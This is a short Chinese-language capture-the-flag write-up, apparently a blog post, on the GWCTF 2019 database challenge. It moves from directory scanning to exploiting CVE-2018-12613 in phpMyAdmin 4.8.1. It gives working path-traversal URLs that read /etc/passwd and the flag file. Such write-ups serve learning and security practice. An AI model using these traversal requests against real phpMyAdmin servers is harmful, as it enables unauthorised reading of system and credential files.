来自
[GWCTF 2019]我有一个数据库
抽象题目,但其实没啥技术含量,只需要你能找到切入关键就行。
打开一看就是中文乱码:
放到赛博厨子的magic里,开启intensive模块看看能不能梭出来东西:
看是看到了,但是没啥用啊。
源码也没东西。
记住,当你走投无路的时候,就用dirsearch扫吧,基本有信息泄露才会有进一步,除非题目的相关信息直接能搜出来。
数据库,啥也没有,只能扫了:
那就直接访问这个phpmyadmin和这几个目录试试,这个phpmyadmin是一个数据库管理系统:
(补充--看看百度百科的解释:)
也没啥信息,但是知道这个方向应该对了。
进来我也没啥方法,这里只有去搜phpmyadmin的漏洞,看看能不能黑了。
还真有,叫做:
文件包含,phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)
即到4.8.1版本存在任意文件读取漏洞,这里可以文件路径穿越。
首先肯定是用经典的/etc/passwd试试水:
/phpmyadmin/index.php?target=db_datadict.php%253f../../../../../../etc/passwd
也可以:
/phpmyadmin/?target=db_sql.php%253f/../../../../../../../../etc/passwd
那直接穿就完事了:
/phpmyadmin/?target=db_sql.php%253f/../../../../../../../../../flag
确实没啥技术含量,就是要会搜。
标签:phpmyadmin,target,..,passwd,数据库,db,奇怪 From: https://www.cnblogs.com/EddieMurphy-blogs/p/17709482.html